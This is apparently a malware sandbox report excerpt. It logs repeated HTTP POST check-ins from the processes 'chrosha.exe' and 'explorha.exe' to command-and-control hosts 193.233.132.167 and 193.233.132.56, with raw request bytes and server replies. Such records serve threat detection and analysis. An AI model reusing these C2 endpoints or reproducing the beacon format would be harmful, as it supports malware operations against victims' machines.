                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
278         192.168.2.5  50120        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:15.043200016 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:15.296638012 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
279         192.168.2.5  50121        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:15.107502937 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:15.355252981 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
280         192.168.2.5  50122        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:15.604732037 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:15.852655888 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
281 | 192.168.2.5 | 50123 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:15.651411057 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:15.900526047 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:31:15.908818007 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:16.163661003 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
282 | 192.168.2.5 | 50124 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:16.213439941 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:16.458899975 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
283 | 192.168.2.5 | 50125 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:16.527877092 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:16.778974056 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
284 | 192.168.2.5 | 50126 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:16.713920116 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:16.967158079 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
285 | 192.168.2.5 | 50127 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:17.035180092 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:17.291246891 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
286 | 192.168.2.5 | 50128 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:17.326524973 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:17.574265957 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
287 | 192.168.2.5 | 50129 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:17.652471066 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:17.899439096 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
288 | 192.168.2.5 | 50130 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:17.823016882 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:18.070862055 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
289 | 192.168.2.5 | 50131 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:18.151197910 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:18.399919987 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
290 | 192.168.2.5 | 50132 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:18.433042049 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:18.680342913 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
291 | 192.168.2.5 | 50133 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:18.755290985 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:18.997711897 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
292 | 192.168.2.5 | 50134 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:18.926899910 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:19.173882961 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
293 | 192.168.2.5 | 50135 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:19.246440887 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:19.495146990 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
294 | 192.168.2.5 | 50136 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:19.540589094 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
